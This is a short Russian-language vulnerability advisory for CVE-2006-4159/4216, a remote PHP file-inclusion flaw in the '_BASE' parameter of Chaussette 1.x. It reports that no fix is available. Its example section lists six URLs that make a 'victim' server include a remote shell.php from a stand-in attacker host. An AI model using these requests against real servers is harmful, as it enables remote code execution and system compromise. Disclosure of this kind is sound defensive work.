PHP-инклюдинг в Chaussette

Дата публикации:	18.08.2006
Всего просмотров:	2884
Опасность:	Высокая
Наличие исправления:	Нет
Количество уязвимостей:	1
CVE ID:	CVE-2006-4159 CVE-2006-4216
Вектор эксплуатации:	Удаленная
Воздействие:	Компрометация системы
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	Chaussette 1.x
	Уязвимые версии: Chaussette 1.х Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "_BASE" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: http://victim/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php http://victim/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php http://victim/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php http://victim/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php http://victim/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php http://victim/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php URL производителя: chaussette.bibimax.homedns.org Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки:	Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities

PHP-инклюдинг в Chaussette

Подпишитесь на email рассылку